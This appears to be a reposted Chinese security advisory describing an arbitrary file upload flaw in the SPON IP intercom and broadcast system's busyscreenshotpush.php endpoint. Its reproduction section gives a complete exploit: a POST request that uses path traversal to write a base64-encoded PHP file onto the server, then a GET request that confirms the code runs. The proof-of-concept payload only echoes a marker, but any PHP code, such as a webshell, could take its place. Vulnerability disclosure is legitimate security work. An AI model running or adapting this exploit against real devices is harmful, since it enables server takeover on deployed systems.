1. 漏洞描述
世邦通信 SPON IP网络对讲广播系统 busyscreenshotpush.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
2. 漏洞复现
POST /php/busyscreenshotpush.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)Content-Length: 215Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate, brConnection: closejsondata[caller]=1&jsondata[callee]=../../../../../ICPAS/Wnmp/WWW/php/&jsondata[imagename]=1_2_test.php&jsondata[imagecontent]=PD9waHAgZWNobyAnT3RFWHkwSVJncExWMzkxdzNSUzd5OVR5U1BGM1dVeDAnO3VubGluayhfX0ZJTEVfXyk7Pz4=
jsondata[imagecontent]的参数是经过base64编码的,在此处以以下代码为例:
<?php echo 'OtEXy0IRgpLV391w3RS7y9TySPF3WUx0';unlink(__FILE__);?>
显示"{"res":"1"}",即为上传成功,上传成功后访问/php/1_2_test.php,查看文件是否上传成功,文件是否能够解析。
GET /php/1_2_test.php HTTP/1.1Host:User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)Content-Length: 0Accept-Encoding: gzip, deflate, brConnection: close
成功执行echo OtEXy0IRgpLV391w3RS7y9TySPF3WUx0,并输出返回信息。
原文始发于微信公众号(蟹堡安全团队):世邦通信SPON IP网络对讲广播系统busyscreenshotpush.php 接口处存在文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论